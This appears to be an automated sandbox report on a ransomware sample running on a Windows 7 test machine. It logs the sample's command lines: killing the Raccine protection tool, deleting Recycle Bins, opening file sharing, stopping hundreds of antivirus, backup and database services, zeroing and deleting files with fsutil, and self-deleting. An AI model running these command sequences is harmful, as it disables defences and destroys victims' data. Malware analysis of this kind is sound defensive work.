Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | March 24, 2021, 10:06 a.m. | March 24, 2021, 10:11 a.m. |
-
-
taskkill.exe "taskkill" /F /IM RaccineSettings.exe
5540 -
reg.exe "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
8324 -
reg.exe "reg" delete HKCU\Software\Raccine /F
8752 -
schtasks.exe "schtasks" /DELETE /TN "Raccine Rules Updater" /F
4980 -
cmd.exe "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
5332 -
cmd.exe "cmd.exe" /c rd /s /q D:\\$Recycle.bin
2120 -
sc.exe "sc.exe" config Dnscache start= auto
4220 -
sc.exe "sc.exe" config FDResPub start= auto
4404 -
sc.exe "sc.exe" config SQLTELEMETRY start= disabled
3724 -
netsh.exe "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
6980 -
sc.exe "sc.exe" config SSDPSRV start= auto
7912 -
sc.exe "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
3456 -
sc.exe "sc.exe" config SstpSvc start= disabled
7884 -
netsh.exe "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
8496 -
sc.exe "sc.exe" config upnphost start= auto
7804 -
sc.exe "sc.exe" config SQLWriter start= disabled
8156 -
-
net1.exe C:\Windows\system32\net1 start Dnscache /y
1552
-
-
-
net1.exe C:\Windows\system32\net1 stop bedbg /y
5000
-
-
-
net1.exe C:\Windows\system32\net1 start FDResPub /y
6372
-
-
-
net1.exe C:\Windows\system32\net1 start SSDPSRV /y
1476
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
5520
-
-
-
net1.exe C:\Windows\system32\net1 stop avpsus /y
7708
-
-
-
net1.exe C:\Windows\system32\net1 stop MMS /y
2384
-
-
-
net1.exe C:\Windows\system32\net1 start upnphost /y
8176
-
-
-
net1.exe C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
540
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
8952
-
-
-
net1.exe C:\Windows\system32\net1 stop EhttpSrv /y
4436
-
-
-
net1.exe C:\Windows\system32\net1 stop mfewc /y
2092
-
-
-
net1.exe C:\Windows\system32\net1 stop ekrn /y
5056
-
-
-
net1.exe C:\Windows\system32\net1 stop ccEvtMgr /y
5976
-
-
-
net1.exe C:\Windows\system32\net1 stop mozyprobackup /y
8100
-
-
-
net1.exe C:\Windows\system32\net1 stop BMR Boot Service /y
3636
-
-
-
net1.exe C:\Windows\system32\net1 stop ccSetMgr /y
8284
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$TPS /y
5808
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
6656
-
-
-
net1.exe C:\Windows\system32\net1 stop SavRoam /y
8880
-
-
-
net1.exe C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
1364
-
-
-
net1.exe C:\Windows\system32\net1 stop EPUpdateService /y
5108
-
-
-
net1.exe C:\Windows\system32\net1 stop EPSecurityService /y
3940
-
-
-
net1.exe C:\Windows\system32\net1 stop DefWatch /y
8312
-
-
-
net1.exe C:\Windows\system32\net1 stop RTVscan /y
5372
-
-
-
net1.exe C:\Windows\system32\net1 stop ntrtscan /y
4548
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
8240
-
-
-
net1.exe C:\Windows\system32\net1 stop QBFCService /y
5164
-
-
-
net1.exe C:\Windows\system32\net1 stop VSNAPVSS /y
5772
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
6156
-
-
-
net1.exe C:\Windows\system32\net1 stop EsgShKernel /y
8884
-
-
-
net1.exe C:\Windows\system32\net1 stop QBIDPService /y
6608
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamTransportSvc /y
8244
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
7116
-
-
-
net1.exe C:\Windows\system32\net1 stop PDVFSService /y
6964
-
-
-
net1.exe C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
1720
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamDeploymentService /y
7852
-
-
-
net1.exe C:\Windows\system32\net1 stop KAVFS /y
3600
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
2216
-
-
-
net1.exe C:\Windows\system32\net1 stop QBCFMonitorService /y
3368
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamNFSSvc /y
8996
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLWriter /y
6516
-
-
-
net1.exe C:\Windows\system32\net1 stop ESHASRV /y
2284
-
-
-
net1.exe C:\Windows\system32\net1 stop YooBackup /y
2044
-
-
-
net1.exe C:\Windows\system32\net1 stop veeam /y
3896
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
4704
-
-
-
net1.exe C:\Windows\system32\net1 stop SDRSVC /y
4820
-
-
-
net1.exe C:\Windows\system32\net1 stop YooIT /y
2368
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
8384
-
-
-
net1.exe C:\Windows\system32\net1 stop PDVFSService /y
1160
-
-
-
net1.exe C:\Windows\system32\net1 stop KAVFSGT /y
4408
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
7444
-
-
-
net1.exe C:\Windows\system32\net1 stop zhudongfangyu /y
5352
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecVSSProvider /y
6636
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
7000
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamBackupSvc /y
5116
-
-
-
net1.exe C:\Windows\system32\net1 stop FA_Scheduler /y
808
-
-
-
net1.exe C:\Windows\system32\net1 stop stc_raw_agent /y
5992
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
7196
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecJobEngine /y
3420
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
5080
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
5128
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecManagementService /y
2904
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
5048
-
-
-
net1.exe C:\Windows\system32\net1 stop NetMsmqActivator /y
7880
-
-
-
net1.exe C:\Windows\system32\net1 stop kavfsslp /y
4328
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamBrokerSvc /y
4932
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecRPCService /y
8296
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeIS /y
3656
-
-
-
net1.exe C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
6276
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLServerADHelper /y
7916
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
6936
-
-
-
net1.exe C:\Windows\system32\net1 stop AcrSch2Svc /y
9204
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
8536
-
-
-
net1.exe C:\Windows\system32\net1 stop “Symantec System Recovery” /y
3276
-
-
-
net1.exe C:\Windows\system32\net1 stop McAfeeEngineService /y
2816
-
-
-
net1.exe C:\Windows\system32\net1 stop klnagent /y
4952
-
-
-
net1.exe C:\Windows\system32\net1 stop AcronisAgent /y
4092
-
-
-
net1.exe C:\Windows\system32\net1 stop SamSs /y
6560
-
-
-
net1.exe C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
2272
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
1320
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamCatalogSvc /y
6972
-
-
-
net1.exe C:\Windows\system32\net1 stop CASAD2DWebSvc /y
6296
-
-
-
net1.exe C:\Windows\system32\net1 stop ReportServer /y
204
-
-
-
net1.exe C:\Windows\system32\net1 stop UI0Detect /y
5196
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
4852
-
-
-
net1.exe C:\Windows\system32\net1 stop CAARCUpdateSvc /y
5400
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
6476
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeSA /y
4236
-
-
-
net1.exe C:\Windows\system32\net1 stop McAfeeFramework /y
6588
-
-
-
net1.exe C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
8948
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
8868
-
-
-
net1.exe C:\Windows\system32\net1 stop macmnsvc /y
3812
-
-
-
net1.exe C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
5260
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamMountSvc /y
7312
-
-
-
net1.exe C:\Windows\system32\net1 stop MsDtsServer110 /y
4832
-
-
-
net1.exe C:\Windows\system32\net1 stop ReportServer$TPS /y
6344
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamCloudSvc /y
6164
-
-
-
net1.exe C:\Windows\system32\net1 stop MsDtsServer /y
5672
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
6068
-
-
-
net1.exe C:\Windows\system32\net1 stop IISAdmin /y
7496
-
-
-
net1.exe C:\Windows\system32\net1 stop POP3Svc /y
5300
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
5340
-
-
-
net1.exe C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
7224
-
-
-
net1.exe C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
4068
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeMGMT /y
9004
-
-
-
net1.exe C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
1136
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeES /y
6932
-
-
-
net1.exe C:\Windows\system32\net1 stop masvc /y
5284
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamNFSSvc /y
2436
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos Clean Service” /y
8876
-
-
-
net1.exe C:\Windows\system32\net1 stop W3Svc /y
8092
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos Agent” /y
9184
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamDeploymentService /y
1100
-
-
-
net1.exe C:\Windows\system32\net1 stop MySQL57 /y
8928
-
-
-
net1.exe C:\Windows\system32\net1 stop SMTPSvc /y
4968
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeSRS /y
8332
-
-
-
net1.exe C:\Windows\system32\net1 stop EraserSvc11710 /y
7544
-
-
-
net1.exe C:\Windows\system32\net1 stop McShield /y
8372
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
8152
-
-
-
net1.exe C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
2952
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos Health Service” /y
2724
-
-
-
net1.exe C:\Windows\system32\net1 stop “Enterprise Client Service” /y
6092
-
-
-
net1.exe C:\Windows\system32\net1 stop MBAMService /y
7636
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamRESTSvc /y
296
-
-
-
net1.exe C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
5956
-
-
-
net1.exe C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
3016
-
-
-
net1.exe C:\Windows\system32\net1 stop “SQL Backups /y
4148
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamDeploySvc /y
8936
-
-
-
net1.exe C:\Windows\system32\net1 stop MySQL80 /y
5152
-
-
-
net1.exe C:\Windows\system32\net1 stop msftesql$PROD /y
1004
-
-
-
net1.exe C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
3304
-
-
-
net1.exe C:\Windows\system32\net1 stop MsDtsServer100 /y
2292
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQLSERVER /y
3336
-
-
-
net1.exe C:\Windows\system32\net1 stop McTaskManager /y
3496
-
-
-
net1.exe C:\Windows\system32\net1 stop SstpSvc /y
7432
-
-
-
net1.exe C:\Windows\system32\net1 stop MSOLAP$TPS /y
772
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
6224
-
-
-
net1.exe C:\Windows\system32\net1 stop MBEndpointAgent /y
3364
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamTransportSvc /y
6812
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeMTA /y
8560
-
-
-
net1.exe C:\Windows\system32\net1 stop “aphidmonitorservice” /y
932
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
8800
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
2152
-
-
-
net1.exe C:\Windows\system32\net1 stop OracleClientCache80 /y
5644
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecRPCService /y
6652
-
-
-
net1.exe C:\Windows\system32\net1 stop msexchangeadtopology /y
152
-
-
-
net1.exe C:\Windows\system32\net1 stop audioendpointbuilder /y
5768
-
-
-
net1.exe C:\Windows\system32\net1 stop mfefire /y
9052
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
8776
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
7744
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
6768
-
-
-
net1.exe C:\Windows\system32\net1 stop wbengine /y
3848
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
3644
-
-
-
net1.exe C:\Windows\system32\net1 stop SepMasterService /y
4628
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
7788
-
-
-
net1.exe C:\Windows\system32\net1 stop AcrSch2Svc /y
9208
-
-
-
net1.exe C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
3768
-
-
-
net1.exe C:\Windows\system32\net1 stop AVP /y
2464
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
5796
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
2920
-
-
-
net1.exe C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
8448
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
6800
-
-
-
net1.exe C:\Windows\system32\net1 stop ShMonitor /y
2560
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecVSSProvider /y
4416
-
-
-
net1.exe C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
6208
-
-
-
net1.exe C:\Windows\system32\net1 stop mfemms /y
1816
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
1060
-
-
-
net1.exe C:\Windows\system32\net1 stop wbengine /y
3032
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
6780
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$PROD /y
8512
-
-
-
net1.exe C:\Windows\system32\net1 stop msexchangeimap4 /y
2484
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
6096
-
-
-
net1.exe C:\Windows\system32\net1 stop Smcinst /y
3052
-
-
-
net1.exe C:\Windows\system32\net1 stop RESvc /y
3444
-
-
-
net1.exe C:\Windows\system32\net1 stop DCAgent /y
6016
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
8364
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos MCS Client” /y
3828
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
4508
-
-
-
net1.exe C:\Windows\system32\net1 stop mfevtp /y
5452
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
4964
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
6404
-
-
-
net1.exe C:\Windows\system32\net1 stop ARSM /y
5184
-
-
-
net1.exe C:\Windows\system32\net1 stop SmcService /y
8900
-
-
-
net1.exe C:\Windows\system32\net1 stop sms_site_sql_backup /y
9300
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecJobEngine /y
9424
-
-
-
net1.exe C:\Windows\system32\net1 stop swi_filter /y
9484
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
9664
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
9692
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
9924
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$PROD /y
10176
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$TPS /y
3928
-
-
-
net1.exe C:\Windows\system32\net1 stop unistoresvc_1af40a /y
10088
-
-
-
net1.exe C:\Windows\system32\net1 stop SntpService /y
10080
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
3964
-
-
-
net1.exe C:\Windows\system32\net1 stop AcronisAgent /y
9404
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
9792
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
9940
-
-
-
net1.exe C:\Windows\system32\net1 stop swi_service /y
9232
-
-
-
net1.exe C:\Windows\system32\net1 stop BackupExecManagementService /y
10000
-
-
-
net1.exe C:\Windows\system32\net1 stop “Sophos Message Router” /y
9408
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
10212
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLTELEMETRY /y
9400
-
-
-
net1.exe C:\Windows\system32\net1 stop sacsvr /y
9568
-
-
-
net1.exe C:\Windows\system32\net1 stop sophossps /y
10100
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
7684
-
-
-
net1.exe C:\Windows\system32\net1 stop swi_update /y
9304
-
-
-
net1.exe C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
3200
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
10236
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$CXDB /y
9660
-
-
-
net1.exe C:\Windows\system32\net1 stop Antivirus /y
9996
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
9684
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
9444
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
9584
-
-
-
net1.exe C:\Windows\system32\net1 stop SAVAdminService /y
10132
-
-
-
net1.exe C:\Windows\system32\net1 stop swi_update_64 /y
10036
-
-
-
net1.exe C:\Windows\system32\net1 stop WRSVC /y
10408
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
10452
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
10608
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
10764
-
-
-
net1.exe C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
10848
-
-
-
net1.exe C:\Windows\system32\net1 stop svcGenericHost /y
11004
-
-
notepad.exe "C:\Windows\System32\notepad.exe" C:\Users\test22\Desktop\RESTORE_FILES_INFO.txt
10540 -
-
net1.exe C:\Windows\system32\net1 stop SAVService /y
11068
-
-
-
net1.exe C:\Windows\system32\net1 stop TmCCSF /y
11096
-
-
-
net1.exe C:\Windows\system32\net1 stop vapiendpoint /y
11176
-
-
cmd.exe "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
10968-
PING.EXE ping 127.0.0.7 -n 3
10340 -
fsutil.exe fsutil file setZeroData offset=0 length=524288 “%s”
6028
-
-
-
net1.exe C:\Windows\system32\net1 stop SQLBrowser /y
4008
-
-
cmd.exe "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\Client-0.exe
11208-
choice.exe choice /C Y /N /D Y /T 3
9028
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1848
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
172.217.25.14 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\한글과컴퓨터\한컴 자동 업데이트.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office 도구\VBA 프로젝트용 디지털 인증서.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Python 2.7\Uninstall Python.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Groove 2007.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\HttpWatch Help.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Sync Center.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\HttpWatch Studio.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows PowerShell Modules.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk |
file | C:\Users\test22\Links\Desktop.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Chrome.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\한글과컴퓨터\한컴오피스 한글 2010\한컴 사전.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows Anytime Upgrade.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\한글과컴퓨터\한컴오피스 한글 2010\한컴 타자연습.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Disk Cleanup.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Backup and Restore Center.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip Help.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Get Help.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Check For Updates.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\한글과컴퓨터\한컴오피스 한글 2010\한컴오피스 한글 2010.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Publisher 2007.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\한글과컴퓨터\한컴오피스 한글 2010\한컴 문서찾기.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\ShapeCollector.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Excel 2007.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Sound Recorder.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office 도구\Microsoft Office 2007 언어 설정.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration Management.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\한글과컴퓨터\한컴오피스 한글 2010\한컴 기본 설정.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Default Programs.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Data Sources (ODBC).lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Python 2.7\IDLE (Python GUI).lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\한컴 사전.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\Automation Examples.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Mobility Center.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Windows Easy Transfer.lnk |
file | C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Windows Journal.lnk |
file | C:\Users\test22\Links\Downloads.lnk |
cmdline | "schtasks" /DELETE /TN "Raccine Rules Updater" /F |
cmdline | "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\Client-0.exe |
cmdline | "cmd.exe" /c rd /s /q D:\\$Recycle.bin |
cmdline | "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s” |
cmdline | "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin |
cmdline | cmd.exe "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\Client-0.exe |
file | C:\Users\test22\AppData\Local\Temp\Client-0.exe |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RaccineSettings.exe") |
cmdline | "net.exe" stop SQLAgent$SHAREPOINT /y |
cmdline | "net.exe" stop SDRSVC /y |
cmdline | "net.exe" stop SamSs /y |
cmdline | "net.exe" start SSDPSRV /y |
cmdline | "net.exe" stop SQLAgent$CITRIX_METAFRAME /y |
cmdline | "net.exe" stop MSSQLFDLauncher$SQL_2008 /y |
cmdline | "net.exe" stop Smcinst /y |
cmdline | "net.exe" stop vapiendpoint /y |
cmdline | "net.exe" stop msftesql$PROD /y |
cmdline | "net.exe" stop EPUpdateService /y |
cmdline | "net.exe" stop “Sophos AutoUpdate Service” /y |
cmdline | "net.exe" stop “Sophos Device Control Service” /y |
cmdline | "net.exe" start FDResPub /y |
cmdline | "net.exe" stop ntrtscan /y |
cmdline | "net.exe" start Dnscache /y |
cmdline | "net.exe" stop MSSQLServerADHelper100 /y |
cmdline | "net.exe" stop “SQLsafe Filter Service” /y |
cmdline | "net.exe" stop DefWatch /y |
cmdline | "net.exe" stop MSSQL$PRACTTICEBGC /y |
cmdline | "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y |
cmdline | "net.exe" stop VeeamBackupSvc /y |
cmdline | "net.exe" stop MBAMService /y |
cmdline | "net.exe" stop MSSQL$ECWDB2 /y |
cmdline | "net.exe" stop MSSQL$TPSAMA /y |
cmdline | "net.exe" stop QBIDPService /y |
cmdline | "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes |
cmdline | "net.exe" stop McShield /y |
cmdline | "net.exe" stop sms_site_sql_backup /y |
cmdline | "net.exe" stop sacsvr /y |
cmdline | "net.exe" stop QBFCService /y |
cmdline | "net.exe" stop McAfeeDLPAgentService /y |
cmdline | "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y |
cmdline | "net.exe" stop mfefire /y |
cmdline | "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y |
cmdline | "net.exe" stop QBCFMonitorService /y |
cmdline | "net.exe" stop “Sophos Safestore Service” /y |
cmdline | "net.exe" stop swi_update /y |
cmdline | "net.exe" stop SQLAgent$SBSMONITORING /y |
cmdline | "net.exe" stop MSExchangeIS /y |
cmdline | "net.exe" stop MSSQL$BKUPEXEC /y |
cmdline | "net.exe" stop “Enterprise Client Service” /y |
cmdline | "net.exe" stop SmcService /y |
cmdline | "net.exe" stop EhttpSrv /y |
